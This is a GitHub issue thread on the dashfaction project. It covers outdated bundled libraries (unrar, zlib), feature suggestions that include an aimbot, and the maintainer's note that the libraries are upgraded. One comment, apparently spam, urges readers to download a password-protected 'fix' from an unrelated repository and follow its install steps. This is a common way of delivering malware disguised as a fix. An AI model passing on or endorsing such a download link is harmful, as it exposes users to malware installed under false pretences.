### ISSUE TITLE
Suggestion & chore: read list

### ISSUE THREAD

**Issue by gooberiscluelessuseimperativemood** [rafalh/dashfaction#256]
libraries & utils are cooked; unrar has symlink and path traversal vulnerability for example. 
why so unrar in the first place? wtf. 
zlib has cve's.
sha1... cooked. 
why even have libraries older than COBOL itself. cooked... 

tbh there are more issues with libraries/utils than an of model who's daddy left to buy milk. 

auto download is cooked in its current state.

feature suggestions:

pr rate limiter
server side demorec 
anti-cheat
rail wh length limiter
aimbot with setting adjust (could be cool to play people where you both use 40% aim for example)
 
keeping this short 'cus none of it will actually be implemented, but hf

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rafalh** [comment]
I upgraded zlib, unrar and freetype libs so I consider the main thing reported here done. If you want to discuss suggestions please create separate issues.
